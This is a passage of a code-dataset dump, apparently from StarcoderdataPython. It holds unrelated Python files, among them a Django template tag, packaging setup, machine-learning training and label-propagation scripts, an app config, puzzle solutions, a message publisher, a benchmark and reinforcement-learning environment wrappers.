id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
17797 | <reponame>chop-dbhi/biorepo-portal<filename>brp/formutils.py
from django import template
from django.forms import widgets
register = template.Library()
@register.inclusion_tag('formfield.html')
def formfield(field):
widget = field.field.widget
type_ = None
if isinstance(widget, widgets.Input):
type_ = 'input'
elif isinstance(widget, widgets.Textarea):
type_ = 'textarea'
elif isinstance(widget, widgets.Select):
type_ = 'select'
elif isinstance(widget, widgets.CheckboxInput):
type_ = 'checkbox'
elif isinstance(widget, widgets.RadioInput):
type_ = 'radio'
return {'field': field, 'form': field.form, 'type': type_}
| StarcoderdataPython |
172233 | <gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
# from distutils.command.install import INSTALL_SCHEMES
from setuptools import setup, find_packages
with open("README.rst") as readme_file:
readme = readme_file.read()
with open("CHANGELOG.rst") as history_file:
history = history_file.read()
setup_requirements = [
"pytest-runner",
# TODO(jawahar273): put setup requirements
# (distutils extensions, etc.) here
]
def parse_requirements(filename):
""" load requirements from a pip requirements file
refer: `link <https://stackoverflow.com/questions/25192794/no-module-named-pip-req/>`_
"""
lineiter = (line.strip() for line in open(filename))
return [line for line in lineiter if line and not line.startswith("#")]
# read the `extras_require.json` for getting
# extras_require depencencys.
extras_require = {
"ujson": parse_requirements("requirements_ujson.txt"),
"huey": parse_requirements("requirements_huey.txt"),
"xxhash": parse_requirements("requirements_xxhash.txt"),
}
setup(
name="pntl",
version="0.3.6",
description=(
"used to interface with Senna and" " stanford-parser.jar for dependency parsing"
),
long_description="\n\n" + readme + "\n\n" + history,
author="<NAME>",
author_email="<EMAIL>",
url="https://github.com/jawahar273/practNLPTools-lite",
packages=find_packages(include=["pntl.*"]),
entry_points={"console_scripts": ["pntl=pntl.cli:user_test"]},
include_package_data=True,
install_requires=parse_requirements("requirements.txt"),
license="MIT license",
zip_safe=False,
keywords="practnlptools-lite senna python pntl".split(),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Topic :: Scientific/Engineering :: Information Analysis",
],
test_suite="tests",
tests_require=parse_requirements("requirements_dev.txt"),
setup_requires=setup_requirements,
extras_require=extras_require,
)
| StarcoderdataPython |
1729095 | import sys
sys.path.append('..')
from mtevi.mtevi import *
from mtevi.utils import *
import numpy as np
import torch
import argparse
import os
import math
from BayesianDTI.utils import *
from torch.utils.data import Dataset, DataLoader
from BayesianDTI.datahelper import *
from BayesianDTI.model import *
from BayesianDTI.predictor import *
from scipy.stats import t
from BayesianDTI.utils import confidence_interval
import matplotlib.pyplot as plt
import matplotlib
matplotlib.style.use('ggplot')
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--fold_num", type=int,
help="Fold number. It must be one of the {0,1,2,3,4}.")
parser.add_argument("-e", "--epochs", type=int, default=200,
help="Number of epochs.")
parser.add_argument("-o", "--output",
help="The output directory.")
parser.add_argument("--type", default='None',
help="Davis or Kiba; dataset select.")
parser.add_argument("--model",
help="The trained baseline model. If given, keep train the model.")
parser.add_argument("--abl", action='store_true',
help="Use the vanilla MSE")
parser.add_argument("--evi", action='store_true',
help="Use the vanilla evidential network")
parser.add_argument("--reg", type=float, default=0.0001,
help="Coefficient of evidential regularization")
parser.add_argument("--l2", type=float, default=0.0001,
help="Coefficient of L2 regularization")
parser.add_argument("--cuda", type=int, default=0, help="cuda device number")
args = parser.parse_args()
torch.cuda.set_device(args.cuda)
args.type = args.type.lower()
dir = args.output
print("Arguments: ########################")
print('\n'.join(f'{k}={v}' for k, v in vars(args).items()))
print("###################################")
try:
os.mkdir(args.output)
except FileExistsError:
print("The output directory {} is already exist.".format(args.output))
#######################################################################
### Load data
FOLD_NUM = int(args.fold_num) # {0,1,2,3,4}
class DataSetting:
def __init__(self):
self.dataset_path = 'data/{}/'.format(args.type)
self.problem_type = '1'
self.is_log = False if args.type == 'kiba' else True
data_setting = DataSetting()
dataset = DataSet(data_setting.dataset_path,
1000 if args.type == 'kiba' else 1200,
100 if args.type == 'kiba' else 85) ## KIBA (1000,100) DAVIS (1200, 85)
smiles, proteins, Y = dataset.parse_data(data_setting)
test_fold, train_folds = dataset.read_sets(data_setting)
label_row_inds, label_col_inds = np.where(np.isnan(Y)==False)
test_drug_indices = label_row_inds[test_fold]
test_protein_indices = label_col_inds[test_fold]
train_fold_sum = []
for i in range(5):
if i != FOLD_NUM:
train_fold_sum += train_folds[i]
train_drug_indices = label_row_inds[train_fold_sum]
train_protein_indices = label_col_inds[train_fold_sum]
valid_drug_indices = label_row_inds[train_folds[FOLD_NUM]]
valid_protein_indices = label_col_inds[train_folds[FOLD_NUM]]
dti_dataset = DTIDataset(smiles, proteins, Y, train_drug_indices, train_protein_indices)
valid_dti_dataset = DTIDataset(smiles, proteins, Y, valid_drug_indices, valid_protein_indices)
test_dti_dataset = DTIDataset(smiles, proteins, Y, test_drug_indices, test_protein_indices)
dataloader = DataLoader(dti_dataset, batch_size=256, shuffle=True, collate_fn=collate_dataset)#, pin_memory=True)
valid_dataloader = DataLoader(valid_dti_dataset, batch_size=256, shuffle=True, collate_fn=collate_dataset)#, pin_memory=True)
test_dataloader = DataLoader(test_dti_dataset, batch_size=256, shuffle=True, collate_fn=collate_dataset)#, pin_memory=True)
##########################################################################
### Define models
device = 'cuda:{}'.format(args.cuda)
dti_model = EvidentialDeepDTA(dropout=True).to(device)
objective_fn = EvidentialnetMarginalLikelihood().to(device)
objective_mse = torch.nn.MSELoss()
regularizer = EvidenceRegularizer(factor=args.reg).to(device)
opt = torch.optim.Adam(dti_model.parameters(), lr=0.001, weight_decay=args.l2)
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer=opt, lr_lambda=lambda epoch: 0.99 ** epoch,
last_epoch=-1,
verbose=False)
total_valid_loss = 0.
total_valid_nll = 0.
total_nll = 0.
train_nll_history = []
valid_loss_history = []
valid_nll_history = []
##########################################################################
### Training
a_history = []
best_nll = 10000
for epoch in range(args.epochs):
dti_model.train()
for d, p, y in dataloader:
y = y.unsqueeze(1).to(device)
gamma, nu, alpha, beta = dti_model(d.to(device), p.to(device))
opt.zero_grad()
###############################################################
#### NLL training
loss = objective_fn(gamma, nu, alpha, beta, y)
total_nll += loss.item()
loss += regularizer(gamma, nu, alpha, beta, y)
if not args.evi:
if args.abl:
mse = objective_mse(gamma, y)
else:
mse = modified_mse(gamma, nu, alpha, beta, y)
loss += mse.mean()
loss.backward()
###############################################################
opt.step()
scheduler.step()
dti_model.eval()
for d_v, p_v, y_v in valid_dataloader:
y_v = y_v.unsqueeze(1).to(device)
gamma, nu, alpha, beta = dti_model(d_v.to(device), p_v.to(device))
nll_v = objective_fn(gamma,
nu,
alpha,
beta,
y_v)
valid_nll_history.append(nll_v.item())
total_valid_nll += nll_v.item()
nll_v = objective_mse(gamma, y_v).mean()
valid_loss_history.append(nll_v.item())
total_valid_loss += nll_v.item()
train_nll = total_nll/len(dataloader)
valid_nll = total_valid_nll/len(valid_dataloader)
valid_loss = total_valid_loss/len(valid_dataloader)
if math.isnan(valid_nll):
break
if best_nll >= valid_nll:
torch.save(dti_model, dir + '/dti_model_best.model')
best_nll = valid_nll
print("Epoch {}: Train NLL [{:.5f}] Val MSE [{:.5f}] Val NLL [{:.5f}]".format(
epoch+1, train_nll, valid_loss, valid_nll))
total_nll = 0.
total_valid_loss = 0.
total_valid_nll = 0.
##########################################################################
fig = plt.figure(figsize=(15,5))
plt.plot(valid_loss_history, label="MSE")
plt.plot(valid_nll_history, label="NLL")
plt.title("Validate loss")
plt.xlabel("Validate steps")
plt.legend(facecolor='white', edgecolor='black')
plt.tight_layout()
plt.savefig(dir + "/MultitaskLoss.png")
##########################################################################
### Evaluation
import torch.distributions.studentT as studentT
predictor = EviNetDTIPredictor()
eval_model = torch.load(dir + '/dti_model_best.model').to(device)
mu_t, std_t, mu_Y_t, freedom_t = predictor(test_dataloader, eval_model)
total_t = std_t['total']
epistemic_t = std_t['epistemic']
aleatoric_t = std_t['aleatoric']
predictive_entropy = studentT.StudentT(torch.from_numpy(freedom_t), scale=torch.from_numpy(total_t)).entropy()
##########################################################################
from BayesianDTI.utils import plot_predictions
plot_predictions(mu_Y_t, mu_t, total_t, title="Mean prediction test with total uncertainty",
sample_num=freedom_t, savefig=dir + "/total_uncertainty.png")
plot_predictions(mu_Y_t, mu_t, aleatoric_t, title="Mean prediction test with aleatoric uncertainty",
sample_num=None, savefig=dir + "/aleatoric_uncertainty.png")
plot_predictions(mu_Y_t, mu_t, epistemic_t, title="Mean prediction test with epistemic uncertainty",
sample_num=None, savefig=dir + "/epistemic_uncertainty.png")
plot_predictions(mu_Y_t, mu_t, predictive_entropy, title="Mean prediction test with predictive entropy",
sample_num=freedom_t, savefig=dir + "/total_uncertainty_colored.png", rep_conf='color')
##########################################################################
from BayesianDTI.utils import evaluate_model
import json
eval_results = evaluate_model(mu_Y_t, mu_t, total_t, sample_num=freedom_t)
eval_json = json.dumps(eval_results, indent=4)
print(eval_json)
with open(dir + '/eval_result_prior.json','w') as outfile:
json.dump(eval_results, outfile)
| StarcoderdataPython |
16123 | import os
import sys
import posthoganalytics
from django.apps import AppConfig
from django.conf import settings
from posthog.utils import get_git_branch, get_git_commit, get_machine_id
from posthog.version import VERSION
class PostHogConfig(AppConfig):
name = "posthog"
verbose_name = "PostHog"
def ready(self):
posthoganalytics.api_key = "<KEY>"
posthoganalytics.personal_api_key = os.environ.get("POSTHOG_PERSONAL_API_KEY")
# Skip plugin sync in manage.py scripts and in tests
# (the database tables might not yet be created)
if (
not settings.TEST
and not "makemigrations" in sys.argv
and not "migrate" in sys.argv
and not "manage.py" in " ".join(sys.argv)
and not "/mypy" in sys.argv[0]
):
from posthog.plugins import sync_plugin_config
# syncs posthog.json['plugins'] and the Plugin/PluginConfig models
sync_plugin_config()
if settings.DEBUG:
# log development server launch to posthog
if os.getenv("RUN_MAIN") == "true":
posthoganalytics.capture(
get_machine_id(),
"development server launched",
{"posthog_version": VERSION, "git_rev": get_git_commit(), "git_branch": get_git_branch(),},
)
posthoganalytics.disabled = True
elif settings.TEST or os.environ.get("OPT_OUT_CAPTURE"):
posthoganalytics.disabled = True
| StarcoderdataPython |
113522 | <filename>src/day2.py
# Advent of Code 2021, Day 2
# (c) blu3r4y
from aocd.models import Puzzle
from dotmap import DotMap
from funcy import print_calls
from parse import parse
@print_calls
def part1(instructions):
hor, dep = 0, 0
for e in instructions:
if e.dir == "forward":
hor += e.num
elif e.dir == "down":
dep += e.num
elif e.dir == "up":
dep -= e.num
return hor * dep
@print_calls
def part2(instructions):
hor, dep, aim = 0, 0, 0
for e in instructions:
if e.dir == "forward":
hor += e.num
dep += aim * e.num
elif e.dir == "down":
aim += e.num
elif e.dir == "up":
aim -= e.num
return hor * dep
def load(data):
return [DotMap(parse("{dir:l} {num:d}", line).named) for line in data.split("\n")]
if __name__ == "__main__":
puzzle = Puzzle(year=2021, day=2)
ans1 = part1(load(puzzle.input_data))
# puzzle.answer_a = ans1
ans2 = part2(load(puzzle.input_data))
# puzzle.answer_b = ans2
| StarcoderdataPython |
1604379 | <gh_stars>0
import json
from random import randint
from time import sleep
import uuid
from python_liftbridge import Lift, Message, Stream, ErrStreamExists
def my_random_string(string_length=10):
"""Returns a random string of length string_length."""
random = str(uuid.uuid4())
random = random.upper()
random = random.replace("-", "")
return random[0:string_length]
# Create a Liftbridge client.
client = Lift(ip_address='localhost:9292', timeout=5)
# Create a stream attached to the NATS subject "foo".
try:
client.create_stream(
Stream(subject='test3', name='test4-stream', replication_factor=1))
except ErrStreamExists:
print('This stream already exists!')
# Publish a message to "foo".
while True:
msg = {"event_triggered": my_random_string(5)}
client.publish(Message(value=json.dumps(msg), stream='test4-stream'))
random_us = randint(10, 100) / 1000000.0
sleep(random_us) | StarcoderdataPython |
31750 | <gh_stars>0
# This code is based on the SOM class library.
#
# Copyright (c) 2001-2021 see AUTHORS.md file
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from benchmark import Benchmark
class _TowersDisk:
def __init__(self, size):
self.size = size
self.next = None
class Towers(Benchmark):
def __init__(self):
self._piles = None
self._moves_done = 0
def _push_disk(self, disk, pile):
top = self._piles[pile]
if top is not None and disk.size >= top.size:
raise Exception("Cannot put a big disk on a smaller one")
disk.next = top
self._piles[pile] = disk
def _pop_disk_from(self, pile):
top = self._piles[pile]
if top is None:
raise Exception("Attempting to remove a disk from an empty pile")
self._piles[pile] = top.next
top.next = None
return top
def _move_top_disk(self, from_pile, to_pile):
self._push_disk(self._pop_disk_from(from_pile), to_pile)
self._moves_done += 1
def _build_tower_at(self, pile, disks):
for i in range(disks, -1, -1):
self._push_disk(_TowersDisk(i), pile)
def _move_disks(self, disks, from_pile, to_pile):
if disks == 1:
self._move_top_disk(from_pile, to_pile)
else:
other_pile = (3 - from_pile) - to_pile
self._move_disks(disks - 1, from_pile, other_pile)
self._move_top_disk(from_pile, to_pile)
self._move_disks(disks - 1, other_pile, to_pile)
def benchmark(self):
self._piles = [None, None, None]
self._build_tower_at(0, 13)
self._moves_done = 0
self._move_disks(13, 0, 1)
return self._moves_done
def verify_result(self, result):
return result == 8191
| StarcoderdataPython |
1702192 | from tanim.utils.color import Color
from tanim.utils.config_ops import digest_config
from tanim.core.mobject.vectorized_mobject import VGroup
from tanim.core.mobject.vectorized_mobject import VMobject
from tanim.extention.mobject.geometry import Line
from tanim.extention.mobject.geometry import Rectangle
import tanim.utils.constants as consts
class SurroundingRectangle(Rectangle):
CONFIG = {
"color": Color('YELLOW'),
"buff": consts.SMALL_BUFF,
}
def __init__(self, mobject, **kwargs):
digest_config(self, kwargs)
kwargs["width"] = mobject.get_width() + 2 * self.buff
kwargs["height"] = mobject.get_height() + 2 * self.buff
Rectangle.__init__(self, **kwargs)
self.move_to(mobject)
class BackgroundRectangle(SurroundingRectangle):
CONFIG = {
"color": Color('BLACK'),
"stroke_width": 0,
"stroke_opacity": 0,
"fill_opacity": 0.75
}
def __init__(self, mobject, **kwargs):
SurroundingRectangle.__init__(self, mobject, **kwargs)
self.original_fill_opacity = self.fill_opacity
def pointwise_become_partial(self, mobject, a, b):
self.set_fill(opacity=b * self.original_fill_opacity)
return self
def set_style_data(self,
stroke_color=None,
stroke_width=None,
fill_color=None,
fill_opacity=None,
family=True
):
# Unchangable style, except for fill_opacity
VMobject.set_style_data(
self,
stroke_color=Color('BLACK'),
stroke_width=0,
fill_color=Color('BLACK'),
fill_opacity=fill_opacity
)
return self
def get_fill_color(self):
return Color(self.color)
class Cross(VGroup):
CONFIG = {
"stroke_color": Color('RED'),
"stroke_width": 6,
}
def __init__(self, mobject, **kwargs):
VGroup.__init__(self,
Line(consts.UP + consts.LEFT, consts.DOWN + consts.RIGHT),
Line(consts.UP + consts.RIGHT, consts.DOWN + consts.LEFT),
)
self.replace(mobject, stretch=True)
self.set_stroke(self.stroke_color, self.stroke_width)
class Underline(Line):
CONFIG = {
"buff": consts.SMALL_BUFF,
}
def __init__(self, mobject, **kwargs):
super().__init__(consts.LEFT, consts.RIGHT, **kwargs)
self.match_width(mobject)
self.next_to(mobject, consts.DOWN, buff=self.buff)
| StarcoderdataPython |
3286973 | import abc
from collections import OrderedDict
import numpy as np
from gym.spaces import Box
from rlkit.core.eval_util import create_stats_ordered_dict
from rlkit.envs.wrappers import ProxyEnv
from rlkit.core.serializable import Serializable
from rlkit.core import logger as default_logger
class MultitaskEnv(object, metaclass=abc.ABCMeta):
"""
An environment with a task that can be specified with a goal.
To change the goal, you need to explicitly call
```
goal = env.sample_goal_for_rollout()
env.set_goal(goal)
env.reset() # optional, but probably for the best
```
If you want to append the goal to the state, do this:
```
env = MyMultitaskEnv()
env = MultitaskToFlatEnv(env)
```
The above code will also make the goal change at every reset.
See MultitaskToFlatEnv for more detail.
If you want to change the goal at every call to reset(), but you do not
want the goal to be appended to the state, do this:
```
env = MyMultitaskEnv()
env = MultitaskEnvToSilentMultitaskEnv(env)
```
See `MultitaskEnvToSilentMultitaskEnv` for more detail.
"""
def __init__(self, distance_metric_order=1, goal_dim_weights=None):
self.multitask_goal = np.zeros(self.goal_dim)
if goal_dim_weights is None:
self.goal_dim_weights = np.ones(self.goal_dim)
else:
self.goal_dim_weights = np.array(goal_dim_weights)
self.distance_metric_order = distance_metric_order
"""
New environments should implement these three functions
"""
@property
@abc.abstractmethod
def goal_dim(self) -> int:
"""
:return: int, dimension of goal vector
"""
pass
@abc.abstractmethod
def sample_goals(self, batch_size):
pass
@abc.abstractmethod
def convert_obs_to_goals(self, obs):
"""
Convert a raw environment observation into a goal (if possible).
"""
pass
"""
Helper functions you probably don't need to override.
"""
def sample_goal_for_rollout(self):
"""
These goals are fed to a policy when the policy wants to actually
do rollouts.
:return:
"""
goal = self.sample_goals(1)[0]
return self.modify_goal_for_rollout(goal)
def convert_ob_to_goal(self, ob):
"""
Convert a raw environment observation into a goal (if possible).
This observation should NOT include the goal.
"""
if isinstance(ob, np.ndarray):
return self.convert_obs_to_goals(
np.expand_dims(ob, 0)
)[0]
else:
return self.convert_obs_to_goals_pytorch(
ob.unsqueeze(0)
)[0]
def compute_reward(self, ob, action, next_ob, goal):
return self.compute_rewards(
ob[None], action[None], next_ob[None], goal[None]
)
"""
Check out these default functions below! You may want to override them.
"""
def set_goal(self, goal):
self.multitask_goal = goal
def compute_rewards(self, obs, actions, next_obs, goals):
return - np.linalg.norm(
self.convert_obs_to_goals(next_obs) - goals,
axis=1,
keepdims=True,
ord=self.distance_metric_order,
)
def convert_obs_to_goals_pytorch(self, obs):
"""
PyTorch version of `convert_obs_to_goals`.
"""
return self.convert_obs_to_goals(obs)
def modify_goal_for_rollout(self, goal):
"""
Modify a goal so that it's appropriate for doing a rollout.
Common use case: zero out the goal velocities.
:param goal:
:return:
"""
return goal
def log_diagnostics(self, paths, logger=default_logger):
list_of_goals = _extract_list_of_goals(paths)
if list_of_goals is None:
return
final_differences = []
for path, goals in zip(paths, list_of_goals):
reached = self.convert_ob_to_goal(path['next_observations'][-1])
final_differences.append(reached - goals[-1])
statistics = OrderedDict()
goals = np.vstack(list_of_goals)
observations = np.vstack([path['observations'] for path in paths])
next_observations = np.vstack([path['next_observations'] for path in paths])
actions = np.vstack([path['actions'] for path in paths])
for order in [1, 2]:
final_distances = np.linalg.norm(
np.array(final_differences),
axis=1,
ord=order,
)
goal_distances = np.linalg.norm(
self.convert_obs_to_goals(observations) - np.vstack(goals),
axis=1,
ord=order,
)
statistics.update(create_stats_ordered_dict(
'Multitask L{} distance to goal'.format(order),
goal_distances,
always_show_all_stats=True,
))
statistics.update(create_stats_ordered_dict(
'Multitask Final L{} distance to goal'.format(order),
final_distances,
always_show_all_stats=True,
))
rewards = self.compute_rewards(
observations,
actions,
next_observations,
goals,
)
statistics.update(create_stats_ordered_dict(
'Multitask Env Rewards', rewards,
))
for key, value in statistics.items():
logger.record_tabular(key, value)
"""
Optional functions to implement, since most of my code doesn't use these
any more.
"""
def cost_fn(self, states, actions, next_states):
"""
This is added for model-based code. This is COST not reward.
So lower is better.
:param states: (BATCH_SIZE x state_dim) numpy array
:param actions: (BATCH_SIZE x action_dim) numpy array
:param next_states: (BATCH_SIZE x state_dim) numpy array
:return: (BATCH_SIZE, ) numpy array
"""
if len(next_states.shape) == 1:
next_states = np.expand_dims(next_states, 0)
actual = self.convert_obs_to_goals(next_states)
desired = self.multitask_goal * np.ones_like(actual)
diff = actual - desired
diff *= self.goal_dim_weights
return (diff**2).sum(1)
def _extract_list_of_goals(paths):
"""
Return list of goals. Each element in list is an array of goals and
correspond to the goal from different paths.
Returns None if it's not possible to extract goals from the paths.
:param paths:
:return:
"""
if len(paths) == 0:
return None
if 'goals' in paths[0]:
return [path['goals'] for path in paths]
if 'env_infos' in paths[0]:
env_infos = paths[0]['env_infos']
if isinstance(env_infos, dict): # rllab style paths
return [path['env_infos']['goal'] for path in paths]
elif 'goal' in env_infos[0]:
return [
[info['goal'] for info in path['env_infos']]
for path in paths
]
return None
class MultitaskToFlatEnv(ProxyEnv, Serializable):
"""
This environment tasks a multitask environment and appends the goal to
the state.
"""
def __init__(
self,
env: MultitaskEnv,
give_goal_difference=False,
):
# self._wrapped_env needs to be called first because
# Serializable.quick_init calls getattr, on this class. And the
# implementation of getattr (see below) calls self._wrapped_env.
# Without setting this first, the call to self._wrapped_env would call
# getattr again (since it's not set yet) and therefore loop forever.
self._wrapped_env = env
# Or else serialization gets delegated to the wrapped_env. Serialize
# this env separately from the wrapped_env.
self._serializable_initialized = False
self._wrapped_obs_dim = env.observation_space.low.size
self.give_goal_difference = give_goal_difference
Serializable.quick_init(self, locals())
ProxyEnv.__init__(self, env)
wrapped_low = self.observation_space.low
low = np.hstack((
wrapped_low,
min(wrapped_low) * np.ones(self._wrapped_env.goal_dim)
))
wrapped_high = self.observation_space.low
high = np.hstack((
wrapped_high,
max(wrapped_high) * np.ones(self._wrapped_env.goal_dim)
))
self.observation_space = Box(low, high)
def step(self, action):
ob, reward, done, info_dict = self._wrapped_env.step(action)
new_ob = self._add_goal_to_observation(ob)
return new_ob, reward, done, info_dict
def reset(self):
self._wrapped_env.set_goal(self._wrapped_env.sample_goal_for_rollout())
ob = super().reset()
new_ob = self._add_goal_to_observation(ob)
return new_ob
def log_diagnostics(self, paths, logger=default_logger):
for path in paths:
path['observations'] = (
path['observations'][:, :-self._wrapped_env.goal_dim]
)
path['next_observations'] = (
path['next_observations'][:, :-self._wrapped_env.goal_dim]
)
return self._wrapped_env.log_diagnostics(paths, logger=default_logger)
def _add_goal_to_observation(self, ob):
if self.give_goal_difference:
goal_difference = (
self._wrapped_env.multitask_goal
- self._wrapped_env.convert_ob_to_goal(ob)
)
return np.hstack((ob, goal_difference))
else:
return np.hstack((ob, self._wrapped_env.multitask_goal))
def cost_fn(self, states, actions, next_states):
if len(next_states.shape) == 1:
states = states[None]
actions = actions[None]
next_states = next_states[None]
unwrapped_states = states[:, :self._wrapped_obs_dim]
unwrapped_next_states = next_states[:, :self._wrapped_obs_dim]
return self._wrapped_env.cost_fn(
unwrapped_states,
actions,
unwrapped_next_states,
)
class MultitaskEnvToSilentMultitaskEnv(ProxyEnv, Serializable):
"""
Normally, reset() on a multitask env doesn't change the goal.
Now, reset will silently change the goal.
"""
def reset(self):
self._wrapped_env.set_goal(self._wrapped_env.sample_goal_for_rollout())
return super().reset()
def cost_fn(self, states, actions, next_states):
return self._wrapped_env.cost_fn(
states,
actions,
next_states,
)
def sample_goal_for_rollout(self):
return self._wrapped_env.sample_goal_for_rollout()
def sample_goals(self, batch_size):
return self._wrapped_env.sample_goals(batch_size)
def sample_states(self, batch_size):
return self._wrapped_env.sample_states(batch_size)
def convert_ob_to_goal(self, ob):
return self._wrapped_env.convert_ob_to_goal(ob)
def convert_obs_to_goals(self, obs):
return self._wrapped_env.convert_obs_to_goals(obs)
@property
def multitask_goal(self):
return self._wrapped_env.multitask_goal
def joints_to_full_state(self, *args, **kwargs):
return self._wrapped_env.joints_to_full_state(*args, **kwargs)
| StarcoderdataPython |
1731433 | from .explore_handlers import *
| StarcoderdataPython |
1767204 | <reponame>ipattarapong/dbnd<filename>plugins/dbnd-docker/src/dbnd_docker/docker_ctrl.py
from dbnd._core.task_run.task_run_ctrl import TaskRunCtrl
class DockerRunCtrl(TaskRunCtrl):
def docker_run(self):
pass
def on_kill(self):
pass
| StarcoderdataPython |
15206 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time: 2020/5/14 20:41
# @Author: Mecthew
import time
import numpy as np
import pandas as pd
import scipy
from sklearn.svm import LinearSVC
from sklearn.linear_model import logistic
from sklearn.calibration import CalibratedClassifierCV
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import OneHotEncoder
import scipy.sparse as sp
from utils.logger import get_logger
logger = get_logger("INFO")
class SVM:
def __init__(self, **kwargs):
self.name = "SVM"
self._model = CalibratedClassifierCV(LinearSVC(C=1.0, max_iter=500, class_weight=None, random_state=666))
def fit(self, x_train, y_train):
self._model.fit(x_train, y_train)
def predict(self, x_test):
return self._model.predict_proba(x_test)
class LR:
def __init__(self, **kwargs):
self.name = "LR"
self._model = logistic.LogisticRegression(C=1.0, solver="liblinear", multi_class="auto",
class_weight=None, max_iter=100, random_state=666)
def fit(self, x_train, y_train):
self._model.fit(x_train, y_train)
def predict(self, x_test):
return self._model.predict_proba(x_test)
def prepredict(graph_df, train_indices, use_valid, use_ohe=False):
t1 = time.time()
fea_table = graph_df['fea_table'].set_index(keys="node_index")
train_indices = train_indices
if use_valid:
valid_indices = list(set(graph_df['train_indices']) - set(train_indices))
test_indices = graph_df['test_indices'] + valid_indices
else:
test_indices = graph_df['test_indices']
train_label = graph_df['train_label'].set_index('node_index').loc[train_indices][['label']]
x_train, y_train = fea_table.loc[train_indices].to_numpy(), train_label.to_numpy()
x_test = fea_table.loc[test_indices].to_numpy()
lr = LR()
lr.fit(x_train, y_train)
if use_ohe:
ohe = OneHotEncoder(handle_unknown="ignore").fit(y_train.reshape(-1, 1))
x_train_feat, x_test_feat = ohe.transform(np.argmax(lr.predict(x_train), axis=1).reshape(-1, 1)).toarray(), \
ohe.transform(np.argmax(lr.predict(x_test), axis=1).reshape(-1, 1)).toarray()
else:
x_train_feat, x_test_feat = lr.predict(x_train), \
lr.predict(x_test)
pre_feat = np.concatenate([x_train_feat, x_test_feat], axis=0)
total_indices = np.concatenate([train_indices, test_indices], axis=0)
train_predict = np.argmax(x_train_feat, axis=1)
train_acc = accuracy_score(y_true=y_train, y_pred=train_predict)
t2 = time.time()
logger.info("Time cost for training {}: {}s, train acc {}".format(lr.name, t2-t1, train_acc))
return pd.DataFrame(data=pre_feat, index=total_indices)
def lpa_predict(graph_df, n_class, train_indices, use_valid, max_iter=100, tol=1e-3, use_ohe=False):
t1 = time.time()
train_indices = train_indices
if use_valid:
valid_indices = list(set(graph_df['train_indices']) - set(train_indices))
test_indices = graph_df['test_indices'] + valid_indices
else:
test_indices = graph_df['test_indices']
train_label = graph_df['train_label'].set_index('node_index').loc[train_indices][['label']].to_numpy()
print("Train label shape {}".format(train_label.shape))
train_label = train_label.reshape(-1)
edges = graph_df['edge_file'][['src_idx', 'dst_idx', 'edge_weight']].to_numpy()
edge_index = edges[:, :2].astype(np.int).transpose() # transpose to (2, num_edges)
edge_weight = edges[:, 2].astype(np.float)
num_nodes = len(train_indices) + len(test_indices)
t2 = time.time()
total_indices = np.concatenate([train_indices, test_indices], axis=0)
adj = sp.coo_matrix((edge_weight, edge_index), shape=(num_nodes, num_nodes)).tocsr()
adj = adj[total_indices] # reorder
adj = adj[:, total_indices]
t3 = time.time()
logger.debug("Time cost for transform adj {}s".format(t3 - t2))
row_sum = np.array(adj.sum(axis=1), dtype=np.float)
d_inv = np.power(row_sum, -1).flatten()
d_inv[np.isinf(d_inv)] = 0.
normal_adj = sp.diags(d_inv).dot(adj).tocsr().transpose()
Pll = normal_adj[:len(train_indices), :len(train_indices)].copy()
Plu = normal_adj[:len(train_indices), len(train_indices):].copy()
Pul = normal_adj[len(train_indices):, :len(train_indices)].copy()
Puu = normal_adj[len(train_indices):, len(train_indices):].copy()
label_mat = np.eye(n_class)[train_label]
label_mat_prob = label_mat.copy()
print("Pul shape {}, label_mat shape {}".format(Pul.shape, label_mat_prob.shape))
Pul_dot_lable_mat = Pul.dot(label_mat)
unlabel_mat = np.zeros(shape=(len(test_indices), n_class))
iter, changed = 0, np.inf
t4 = time.time()
logger.debug("Time cost for prepare matrix {}s".format(t4-t3))
while iter < max_iter and changed > tol:
if iter % 10 == 0:
logger.debug("---> Iteration %d/%d, changed: %f" % (iter, max_iter, changed))
iter += 1
pre_unlabel_mat = unlabel_mat
unlabel_mat = Puu.dot(unlabel_mat) + Pul_dot_lable_mat
label_mat_prob = Pll.dot(label_mat_prob) + Plu.dot(pre_unlabel_mat)
changed = np.abs(pre_unlabel_mat - unlabel_mat).sum()
logger.debug("Time cost for training lpa {}".format(time.time() - t4))
# preds = np.argmax(np.array(unlabel_mat), axis=1)
# unlabel_mat = np.eye(n_class)[preds]
train_acc = accuracy_score(y_true=train_label, y_pred=np.argmax(label_mat_prob, axis=1))
logger.info("LPA training acc {}".format(train_acc))
logger.info("Time cost for LPA {}s".format(time.time() - t1))
total_indices = np.concatenate([train_indices, test_indices], axis=0)
if use_ohe:
ohe = OneHotEncoder(handle_unknown="ignore").fit(train_label.reshape(-1, 1))
label_mat_ohe = ohe.transform(np.argmax(label_mat_prob, axis=1).reshape(-1, 1)).toarray()
